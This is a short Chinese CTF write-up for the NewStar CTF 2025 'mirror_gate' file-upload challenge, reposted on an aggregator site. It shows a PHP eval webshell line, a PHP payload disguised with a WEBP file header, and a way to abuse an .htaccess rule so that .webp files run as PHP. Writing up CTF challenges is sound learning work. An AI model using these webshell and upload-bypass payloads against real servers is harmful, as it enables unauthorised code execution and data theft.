NewStar CTF 2025 Week3-mirror_gate题解文件解析+上传漏
0x01 题目文件上传解析漏洞0x02 思路若是文件上传就要注意就算文件后缀过了但是文件内容的恶意代码也会被识破?php eval($_POST[cmd]); ?这种木马肯定不行用RIFFWEBPVP8?cat /f*; ?但是一开始我的思路并不是直接文件上传我先看了一眼源代码发现提示base64解码得到去看一眼这个/uploads/得到那还说什么肯定有东西啊dirsearch开扫很奇怪一开始上传.htaccess的时候是被过滤掉的打开/uploads/.htaccess啥意思意思就是凡是.webp结尾的文件我们php都会把它当作.php的文件解析一开始我试了flag.webp发现还是不行还有种思路重新上传webp结尾的木马温馨提示1.加个文件头别忘记因为你不加他还是不让你上传成功2.因为它自身的.htaccess文件导致你上传抓包时是有些语句冗余的会导致他把你的木马当作普通文件解析了删掉即可如图改请求包0x03 步骤1.上传木马RIFFWEBPVP8?cat /f*; ?2.打开即可
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2435260.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!